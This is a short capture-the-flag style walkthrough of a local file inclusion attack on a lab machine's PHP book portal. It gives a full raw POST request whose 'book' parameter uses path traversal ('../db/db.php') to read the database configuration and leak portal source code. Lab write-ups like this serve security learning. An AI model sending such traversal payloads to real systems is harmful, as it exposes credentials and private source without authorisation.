Skip to main content

Exploiting LFI

Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method.

Changing the method field from 0 to 1 throws an error message about a missing book field.

error message - missing book field

Exploit Code#

Using Burp Suite, we can control the book field, together with the ffuf results, to perform LFI and leak the source code of the book portal as well as the admin portal.

Here, we can read the content of the database config - db.php.

POST /includes/bookController.php HTTP/1.1Host: 10.10.10.228Content-Length: 42Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://10.10.10.228Referer: http://10.10.10.228/php/books.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7YConnection: close
title=&author=a&book=../db/db.php&method=1

We can thus proceed to read the various source code to see if anything important are revealed.